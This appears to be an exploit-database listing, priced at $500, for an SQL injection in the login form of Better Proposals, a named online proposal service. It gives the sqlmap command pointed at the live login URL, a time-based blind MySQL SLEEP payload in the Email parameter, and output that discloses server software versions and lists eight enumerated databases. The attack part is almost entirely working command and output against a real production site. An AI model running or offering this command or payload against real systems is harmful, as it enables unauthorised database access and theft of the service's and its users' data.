Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89: Improper Neutralization of Special Elements used in an SQL Command | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2021-07-27 |
# Exploit Title:Better Proposals: Online Proposal Software | SQL Injection Vulnerability # Author: # Tested On: Kali Linux # sqlmap -u "https://betterproposals.io/2/login/" --form --dbs --batch --------------------------------------------------------------------------------------------------- .io British Territories in the Indian Ocean Better Proposals: Online Proposal Software Online Proposal Software - Better Proposals https://betterproposals.io/2/login/ --- Parameter: Email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: Email=rLlf' AND (SELECT 5491 FROM (SELECT(SLEEP(5)))kKlT) AND 'hbrR'='hbrR&Password=&login=Sign In&RememberMe=1 --- the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 5.6.40 the back-end DBMS: MySQL >= 5.0.12 available databases [8]: [+] better_blog [+] information_schema [+] innodb [+] mysql [+] performance_schema [+] rpawsuebaq [+] sys [+] tmp
Copyright ©2024 Exploitalert.